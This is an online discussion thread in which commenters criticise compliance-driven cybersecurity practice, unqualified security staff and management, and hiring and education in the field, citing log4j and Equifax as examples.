(no title)
dmhmr
|
4 years ago
The past few years have made me feel sour on how many organizations run cybersecurity in general. The industry is full of individuals who do not understand the tech they are protecting, and often they barely understand the security tech they use daily. A lot of places are simply doing compliance check-marking and barely have a shred of technical aptitude. They struggle with basic fundamentals like inventory and patch management. It is an industry that is hard to stay upbeat about if you are looking at anything larger than how it benefits your personal paycheck. If you want to get insight into the reality of how the government operates, just look at GAO reports, they are alarming: https://www.gao.gov/highrisk/ensuring-cybersecurity-nation
Bhilai|4 years ago
The problem is further exacerbated by a class of people who received their MBAs and think they know it all. Just yesterday, a lead product manager was arguing with security folks about why his service needs to be patched for log4j vuln if its not internet facing. He had trouble fathoming that even though his service is not internet facing, it processes and logs user controlled data.
Look at recent Azure vulns, I am pretty sure their internal security team knew about these and after some back and forth some exec might have signed off an exception. They would rather be shipping features than fixing the mess they created. Most infosec peeps have trouble getting teams to prioritize of security stuff and some of the blame falls of infosec teams too for making everything sounds like a end of world scenario. But did Azure lose a single customer or did the stock price go down or loss of revenue? Nope, so whats the point of investing so much in security if it truly the only harm was some loss of reputation.
Even most security execs I have had a chance to interact with dont understand security topics properly, surely they can use some jargon to throw around in all-hands meetings and such. Unless from a security background these execs often confuse security with compliance and instead of investing in defense in depth techniques they look for check-boxes against security controls.
ziddoap|4 years ago
Paradoxically, when someone has a pure (or at least focused) cybersec program (a few 3-4 year programs are taught by reputable institutions near me), and a Sec+ or equivalent, all of the old guard shout about needing years of experience (decades preferably) before you should be allowed to even think about security.
It only takes a few days in r/cybersecurity or r/securitycareeradvice to see these people in action, yelling at kids coming out of a 4-year university course focused on cybersec to "put in their dues" and work a call-center/help-desk for a few years resetting people's passwords before being allowed the honor of applying to an "entry-level" security position.
If a 4 year program cannot prepare you for an entry-level position, either the program is broken or the hiring expectations are broken.
Just in this thread someone was saying they would require 10 years of system administration AND 5 years of security experience before considering to hire them. In the same amount of time you can become a doctor or lawyer, and be operating on people or have established your own law firm.
bluedino|4 years ago
Part of the problem are the for-profit schools and bootcamps cranking out 'cyber security' graduates. They know the least out of all the people I interview. How can you pretend to know anything about cybersecurity when you don't actual know anything about programming or networking?
The classes cover buzzwords like vishing/phishing/smishing, you run Kali Linux and 'hack' something, and then you get your certificate.
Mountain_Skies|4 years ago
I got a lot of good mileage out of explaining the Equifax Struts vulnerability, which allowed attackers to move freely through Equifax internally once outer security was breached because internal security controls, especially around patching, were so weak. Might be worth trying if you encounter the same situation again.
sawmurai|4 years ago
So much this. I had a security review failed because an API would respond with http 422 on invalid input. When I asked why that is a security issue I got shut down with “defense in depth”. After a longer discussion the problem was that 422 was not part of “the original http spec” but rather some ldap extension.
908B64B197|4 years ago
Here's the issue: cyber security is seen as a cost center. As long as it's viewed a cost center good CS programs won't care for it. Which means right now it's relegated to certificates and extension schools... we all know what that means.
If companies/governments start caring for cybersecurity, ie, create a prestigious and visible organization that directly reports to the White House for instance, then you'll see the good CS degrees adding more of it to their curriculum.
> The problem is further exacerbated by a class of people who received their MBAs and think they know it all. Just yesterday, a lead product manager was arguing with security folks about why his service needs to be patched for log4j vuln if its not internet facing. He had trouble fathoming that even though his service is not internet facing, it processes and logs user controlled data.
I remember being in a room like that. At one point several people were arguing and the lead engineer just tapped his brass rat on the table to get everyone's attention. I remember the PM was furious but what was he going to do? They don't sell those at the gift shop...
Truth is, PM orgs need to exist in a parallel way to engineering orgs. PMs managing engineers is a red flag, and a true tech company should ideally have engineers all the way to the CEO position. So if there's security work and engineering deems it necessary, it's done no matter what some non-technical employee thinks.
Engineers could honestly take a page from MDs here. Opinions of non-MDs are basically regarded as irrelevant...
phoehne|4 years ago
I once had to argue back and forth with someone (circa 2008) that JavaScript did not mean "mobile code" in the sense of their checklist. I had to explain what JavaScript was, how it worked, but they were more than willing to tell me I had to remove it from the app I was working on. Which would have rendered my app and all the other apps for that client much less functional.
golergka|4 years ago
What the hell does that even mean?
markus_zhang|4 years ago
Of course the mainstream stuffs are tolerated but anything outside of that would need a long list of approvals.
ransom1538|4 years ago
Why do we have so many security disasters? Because those people are rare unicorns, ridiculously expensive, with no way to show added value.
vsareto|4 years ago
I don't agree that it takes 15 years though. I think you're setting the standards way too high for no good reason, especially for "decent".
mistrial9|4 years ago
The imaginary skilled professional you are describing clearly originates in the mind of an engineering worker.. a person gains skill through experience and is promoted. This is opposite of what management builds over time.. Management specifically and exactly destroys this career path because it costs them more money. As long as you can commoditize and outsource, you drive costs down, not up.
Meanwhile, it is "eternal September" in the job world, with streams of 20-somethings lining up to get into the markets. Add lower cost engineers, for example in Eastern Europe, South East Asia and South Asia. Rinse and repeat.
lol768|4 years ago
When I was working in infosec consulting, by far the best colleagues were those who had software engineering experience and could empathise with developers at the client in order to understand how systems would be built, where corners might be cut, which areas might be more ropey than others etc (and then use that understanding to help inform their thinking from an attacker's perspective).
You could tell at interview too - the folks with a Computer Science background and a side interest in security were much, much better than those who took the dedicated-cyber-security degree/masters route.
You absolutely need a real generalist for security. With that said, I don't think it's unreasonable to expect a developer to know about CIDR notation, networking and cloud systems though we're perhaps straying into more DevOps-y style roles.
johngalt|4 years ago
Sysadmin/ops has too many offramps that drain talent before year 10. If you can integrate software/systems well, manage projects or do advanced troubleshooting; you will likely be pulled out of ops. Conversely there are an ocean of security certifications being issued to people who have very little operational/technical experience.
Data security in practice is being reduced to a policy and procedure checklist. It is frustrating for an engineering group to receive non-specific or contradictory policy guidelines written by non-technical people, but I have yet to see that change hiring or decision making. Businesses want someone who will agree to check the box. If that someone doesn't know all the details, that makes checking the box easier.
The future of cybersecurity is not skilled coordinator/PM but instead yet another non-technical management arm handing down mandates that are blind to technical reality. There isn't another option. There aren't enough people to fulfill demand, and the compensation for cybersecurity positions are often less than a senior infrastructure role. How many sysadmins really understand networking, programming, databases, etc; While also having the people skills to not alienate both management and highly technical development and operations teams? We will never have enough people at the intersection of that many skills.
ziddoap|4 years ago
This points to two issues: education needs to be addressed with more input from industry, and expectations for hiring need to be realistic. 10 years before you're able to work on something security related is not realistic, nor is it sustainable.
WastingMyTime89|4 years ago
markus_zhang|4 years ago
But I do believe that for an entry level you don't need 15 years. Maybe 5 years of sysadmin or devops should be good enough.
formerly_proven|4 years ago
horsawlarway|4 years ago
The entire industry plays a game of:
- Create a checklist (or use an existing checklist - ex: FIPS)
- Check off all the boxes on the checklist (any way they can - however they can, with complete and utter disregard for the spirit of the checklist)
- Confirm with legal that checklist is complete
- Advertise that they are "secure" to customers who happen to care (not many do, honestly) and present them with the required completed checklists
- Get hacked LEFT AND RIGHT because the whole fucking game has nothing to do with security, and everything to do with liability.
- When they're hacked, whip out the checklist again and go "couldn't have been our fault! we followed the checklist."
Repeat.
----
Now - Software security is hard. Unfathomably hard to most people (as in - they literally don't understand). People STILL fail to realize that software security is not like building a bride - I see it still even here on HN, where folks spout off bullshit comparisons to things like restaurant health/safety inspections, or architectural reviews.
The difference is that the bridge is not constantly being assaulted by an intelligent, evolving, malicious, human force. The software usually is.
And the security team can't just win one battle - they have to win every battle. Whether that's old systems, or a tired employee clicking an email link.
So I think you're basically between a rock and a hard place as an honest security worker. The job is literally impossible - so the folks who make money are the ones who compromise fastest and check off the most checklists (again - spirit of the checklist be damned).
I think the ballooning insurance payments (and the obvious eventual halt to offering cybersecurity insurance) will eventually bring the whole house of cards down, but we're still a few years out from that.
asdfsd234234444|4 years ago
markus_zhang|4 years ago
Well, maybe more checklists and consultants.
vipa123|4 years ago
It may not make more revenue but poor security certainly affects profits.
dredmorbius|4 years ago
stef25|4 years ago
Fines would therefore be the obvious solution to the lack of cybersecurity. Network breach / data leak due to not patching software x days after vuln disclosure? Here's your fine!
CommanderData|4 years ago
The reasoning was we probably don't use base64. I was amazed.
SgtBastard|4 years ago
djupblue|4 years ago
antihero|4 years ago
Why would they? Does capitalism incentivise "caring" on a technical and ethical level about doing the right thing, or does it incentivise spending the minimum amount of resources to be covered by insurance and not criminally liable for anything? If they did the "right thing", someone in management is wasting resources.
Of course, if your company is private and the shareholders are decent enough people to make sure the board are doing things properly, this can work. With public companies I don't see how it is remotely feasible?
We have to legislate to compel companies to do this and expand the definition of negligence, which itself is quite complex. Make the people at the very highest levels criminally liable for breaches that happen due to lax, box checking behaviour on their watch. It is the only way.